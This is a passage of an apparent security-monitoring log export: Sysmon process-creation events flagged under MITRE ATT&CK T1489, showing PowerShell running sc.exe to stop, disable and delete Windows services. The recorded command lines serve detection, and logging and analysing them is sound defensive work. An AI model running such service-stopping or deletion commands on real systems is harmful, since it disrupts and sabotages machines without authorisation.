ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.853244300Z"",""eventRecordID"":""3878"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.847\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00100ad23000}\r\nProcessId: 772\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.847"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00100ad23000}"",""processId"":""772"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.137",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.770 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001067cf3000} +ProcessId: 5780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.778669900Z"",""eventRecordID"":""3875"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.770\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001067cf3000}\r\nProcessId: 5780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.770"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001067cf3000}"",""processId"":""5780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.806",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.738 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00101ece3000} +ProcessId: 5792 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WebServers Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WebServers Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.744510600Z"",""eventRecordID"":""3874"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.738\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00101ece3000}\r\nProcessId: 5792\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WebServers Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.738"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00101ece3000}"",""processId"":""5792"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WebServers Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.695 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010f3cb3000} +ProcessId: 1664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.697968600Z"",""eventRecordID"":""3871"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.695\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010f3cb3000}\r\nProcessId: 1664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.695"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010f3cb3000}"",""processId"":""1664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.600",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.633 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001088c93000} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.639252300Z"",""eventRecordID"":""3868"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.633\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001088c93000}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.633"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001088c93000}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.566",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.561 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00108fc73000} +ProcessId: 4912 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.577005500Z"",""eventRecordID"":""3866"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.561\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00108fc73000}\r\nProcessId: 4912\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.561"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00108fc73000}"",""processId"":""4912"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.546",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.537 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010c7c63000} +ProcessId: 6676 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.541890500Z"",""eventRecordID"":""3865"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.537\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010c7c63000}\r\nProcessId: 6676\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 